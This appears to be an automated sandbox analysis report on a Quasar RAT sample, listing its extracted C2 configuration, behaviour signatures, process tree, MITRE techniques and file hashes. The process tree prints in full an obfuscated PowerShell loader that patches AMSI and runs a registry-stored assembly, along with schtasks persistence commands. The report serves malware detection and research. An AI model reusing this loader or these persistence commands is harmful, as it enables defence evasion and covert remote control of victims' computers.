Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    02-05-2024 21:00

General

  • Target

    R0X-Built.exe

  • Size

    409KB

  • MD5

    a0f5aa5764c4f66eee82f857f9f447b6

  • SHA1

    3c3a780d020cb3eb3088223443fe813abb95dccd

  • SHA256

    43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

  • SHA512

    458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

  • SSDEEP

    6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

Slave

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-3vDee7FzoJnhqjuE3n

Attributes
  • encryption_key

    KaNwItdY6wlv5nCN4prL

  • install_name

    $srr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    1000

  • startup_key

    $srr-powershell

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 55 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:640
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:436
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{f39c319f-f66a-49b9-8e6c-789336bcdf6e}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4696
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:696
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:996
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:544
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:424
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1032
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                    PID:1080
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fXOuZBxishVT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$SwaUMAmOkDOVYR,[Parameter(Position=1)][Type]$ZUDPRcQccr)$TXlrRyzpsgo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+'e'+[Char](99)+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'Me'+[Char](109)+''+[Char](111)+''+'r'+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+[Char](121)+''+[Char](112)+'e','C'+'l'+'a'+'s'+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+'c'+','+[Char](83)+'e'+[Char](97)+''+[Char](108)+'e'+'d'+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+'A'+'u'+'t'+''+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$TXlrRyzpsgo.DefineConstructor(''+'R'+''+[Char](84)+'Spec'+[Char](105)+''+'a'+'l'+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$SwaUMAmOkDOVYR).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');$TXlrRyzpsgo.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+'k'+'e',''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+',H'+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+'S'+''+'i'+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+'tu'+'a'+''+'l'+'',$ZUDPRcQccr,$SwaUMAmOkDOVYR).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $TXlrRyzpsgo.CreateType();}$ZjMfLoGTFzmPQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+'t'+'e'+''+[Char](109)+'.'+'d'+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+'r'+'o'+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+'.'+[Char](87)+''+'i'+'n'+[Char](51)+''+'2'+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+'a'+''+[Char](102)+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+''+'h'+''+'o'+'d'+'s'+'');$DehEhqplfrrVjD=$ZjMfLoGTFzmPQ.GetMethod('G'+[Char](101)+''+[Char](116)+'Pr'+'o'+''+[Char](99)+''+'A'+''+'d'+''+'d'+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'ti'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$iNalTUYYkeSOdjmileq=fXOuZBxishVT @([String])([IntPtr]);$OpCZTexszZUOGUiYmgzRFD=fXOuZBxishVT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FBweSqBHfxB=$ZjMfLoGTFzmPQ.GetMethod('G'+[Char](101)+'t'+[Char](77)+'o'+'d'+''+[Char](117)+'leH'+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+'l'+'3'+'2.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ETFISKZBxQrYpV=$DehEhqplfrrVjD.Invoke($Null,@([Object]$FBweSqBHfxB,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+'L'+[Char](105)+''+'b'+''+[Char](114)+'ar'+'y'+''+[Char](65)+'')));$qpAiHuHQWrbFovEal=$DehEhqplfrrVjD.Invoke($Null,@([Object]$FBweSqBHfxB,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l'+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$pcUcxiB=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ETFISKZBxQrYpV,$iNalTUYYkeSOdjmileq).Invoke(''+'a'+''+[Char](109)+''+'s'+'i.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$HwgXefaZTqVPVJgnk=$DehEhqplfrrVjD.Invoke($Null,@([Object]$pcUcxiB,[Object]('A'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+'n'+''+[Char](66)+'u'+[Char](102)+'f'+'e'+'r')));$NewUiwcIUb=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qpAiHuHQWrbFovEal,$OpCZTexszZUOGUiYmgzRFD).Invoke($HwgXefaZTqVPVJgnk,[uint32]8,4,[ref]$NewUiwcIUb);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HwgXefaZTqVPVJgnk,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qpAiHuHQWrbFovEal,$OpCZTexszZUOGUiYmgzRFD).Invoke($HwgXefaZTqVPVJgnk,[uint32]8,0x20,[ref]$NewUiwcIUb);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+'WA'+[Char](82)+''+'E'+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4736
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1132
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                      1⤵
                        PID:1184
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1232
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                          1⤵
                            PID:1276
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1328
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1380
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2956
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                  1⤵
                                  • Drops file in System32 directory
                                  PID:1444
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1536
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1544
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1680
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1708
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k NetworkService -p
                                          1⤵
                                            PID:1732
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1804
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                              1⤵
                                                PID:1832
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1432
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1652
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:2052
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2064
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:2156
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:2268
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2356
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2484
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2492
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                  1⤵
                                                                    PID:2540
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                      PID:2612
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2628
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2660
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                          1⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2672
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2688
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:3032
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3108
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                  PID:3304
                                                                                  • C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe"
                                                                                    2⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4184
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe" /rl HIGHEST /f
                                                                                      3⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:2088
                                                                                    • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:2980
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        "schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f
                                                                                        4⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:1896
                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4864
                                                                                    • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                      "SCHTASKS.exe" /create /tn "$77R0X-Built.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\R0X-Built.exe'" /sc onlogon /rl HIGHEST
                                                                                      3⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:2776
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                  1⤵
                                                                                    PID:3492
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                    1⤵
                                                                                      PID:3520
                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                      1⤵
                                                                                        PID:3904
                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                        1⤵
                                                                                        • Suspicious use of UnmapMainImage
                                                                                        PID:3960
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                        1⤵
                                                                                          PID:4040
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:4048
                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                            C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                            1⤵
                                                                                              PID:4424
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                              1⤵
                                                                                                PID:4512
                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:4800
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                  1⤵
                                                                                                    PID:460
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                    1⤵
                                                                                                      PID:4480
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                      1⤵
                                                                                                        PID:1268
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                        1⤵
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:3184
                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                        1⤵
                                                                                                        • Drops file in System32 directory
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:1356
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                        1⤵
                                                                                                          PID:1840
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                          1⤵
                                                                                                            PID:1728
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                            1⤵
                                                                                                              PID:3196
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:3468
                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                1⤵
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:5048

                                                                                                              Network

                                                                                                              MITRE ATT&CK Matrix ATT&CK v13

                                                                                                              Execution

                                                                                                              Scheduled Task/Job

                                                                                                              1
                                                                                                              T1053

                                                                                                              Persistence

                                                                                                              Scheduled Task/Job

                                                                                                              1
                                                                                                              T1053

                                                                                                              Privilege Escalation

                                                                                                              Scheduled Task/Job

                                                                                                              1
                                                                                                              T1053

                                                                                                              Discovery

                                                                                                              Query Registry

                                                                                                              2
                                                                                                              T1012

                                                                                                              System Information Discovery

                                                                                                              1
                                                                                                              T1082

                                                                                                              Command and Control

                                                                                                              Web Service

                                                                                                              1
                                                                                                              T1102

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                Filesize

                                                                                                                162KB

                                                                                                                MD5

                                                                                                                152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                SHA1

                                                                                                                c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                SHA256

                                                                                                                a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                SHA512

                                                                                                                2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                              • C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
                                                                                                                Filesize

                                                                                                                409KB

                                                                                                                MD5

                                                                                                                a0f5aa5764c4f66eee82f857f9f447b6

                                                                                                                SHA1

                                                                                                                3c3a780d020cb3eb3088223443fe813abb95dccd

                                                                                                                SHA256

                                                                                                                43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3

                                                                                                                SHA512

                                                                                                                458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384

                                                                                                              • C:\Windows\Temp\__PSScriptPolicyTest_1byicwnk.c3d.ps1
                                                                                                                Filesize

                                                                                                                60B

                                                                                                                MD5

                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                SHA1

                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                SHA256

                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                SHA512

                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                              • memory/436-86-0x00007FFE4BF90000-0x00007FFE4BFA0000-memory.dmp
                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/436-79-0x000002C2D2D50000-0x000002C2D2D7B000-memory.dmp
                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/436-85-0x000002C2D2D50000-0x000002C2D2D7B000-memory.dmp
                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/544-90-0x000001ECAFBD0000-0x000001ECAFBFB000-memory.dmp
                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/640-45-0x00000237BAA30000-0x00000237BAA5B000-memory.dmp
                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/640-52-0x00000237BAA30000-0x00000237BAA5B000-memory.dmp
                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/640-53-0x00007FFE4BF90000-0x00007FFE4BFA0000-memory.dmp
                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/640-46-0x00000237BAA30000-0x00000237BAA5B000-memory.dmp
                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/640-44-0x00000237BAA00000-0x00000237BAA25000-memory.dmp
                                                                                                                Filesize

                                                                                                                148KB

                                                                                                              • memory/696-63-0x0000021BF19B0000-0x0000021BF19DB000-memory.dmp
                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/696-57-0x0000021BF19B0000-0x0000021BF19DB000-memory.dmp
                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/696-64-0x00007FFE4BF90000-0x00007FFE4BFA0000-memory.dmp
                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/996-68-0x0000022009290000-0x00000220092BB000-memory.dmp
                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/996-74-0x0000022009290000-0x00000220092BB000-memory.dmp
                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/996-75-0x00007FFE4BF90000-0x00007FFE4BFA0000-memory.dmp
                                                                                                                Filesize

                                                                                                                64KB

                                                                                                              • memory/2980-14-0x0000000074F20000-0x00000000756D1000-memory.dmp
                                                                                                                Filesize

                                                                                                                7.7MB

                                                                                                              • memory/2980-700-0x0000000074F20000-0x00000000756D1000-memory.dmp
                                                                                                                Filesize

                                                                                                                7.7MB

                                                                                                              • memory/2980-699-0x0000000074F20000-0x00000000756D1000-memory.dmp
                                                                                                                Filesize

                                                                                                                7.7MB

                                                                                                              • memory/2980-277-0x0000000007260000-0x000000000726A000-memory.dmp
                                                                                                                Filesize

                                                                                                                40KB

                                                                                                              • memory/2980-13-0x0000000074F20000-0x00000000756D1000-memory.dmp
                                                                                                                Filesize

                                                                                                                7.7MB

                                                                                                              • memory/4184-1-0x0000000000390000-0x00000000003FC000-memory.dmp
                                                                                                                Filesize

                                                                                                                432KB

                                                                                                              • memory/4184-4-0x0000000074F20000-0x00000000756D1000-memory.dmp
                                                                                                                Filesize

                                                                                                                7.7MB

                                                                                                              • memory/4184-20-0x0000000074F20000-0x00000000756D1000-memory.dmp
                                                                                                                Filesize

                                                                                                                7.7MB

                                                                                                              • memory/4184-2-0x00000000053C0000-0x0000000005966000-memory.dmp
                                                                                                                Filesize

                                                                                                                5.6MB

                                                                                                              • memory/4184-3-0x0000000004F50000-0x0000000004FE2000-memory.dmp
                                                                                                                Filesize

                                                                                                                584KB

                                                                                                              • memory/4184-0-0x0000000074F2E000-0x0000000074F2F000-memory.dmp
                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • memory/4184-7-0x0000000006120000-0x000000000615C000-memory.dmp
                                                                                                                Filesize

                                                                                                                240KB

                                                                                                              • memory/4184-6-0x0000000005BD0000-0x0000000005BE2000-memory.dmp
                                                                                                                Filesize

                                                                                                                72KB

                                                                                                              • memory/4184-5-0x0000000004FF0000-0x0000000005056000-memory.dmp
                                                                                                                Filesize

                                                                                                                408KB

                                                                                                              • memory/4696-34-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/4696-33-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/4696-40-0x00007FFE8A1B0000-0x00007FFE8A26D000-memory.dmp
                                                                                                                Filesize

                                                                                                                756KB

                                                                                                              • memory/4696-41-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/4696-39-0x00007FFE8BF00000-0x00007FFE8C109000-memory.dmp
                                                                                                                Filesize

                                                                                                                2.0MB

                                                                                                              • memory/4696-38-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/4696-35-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/4696-36-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/4736-22-0x00000224AEA70000-0x00000224AEA92000-memory.dmp
                                                                                                                Filesize

                                                                                                                136KB

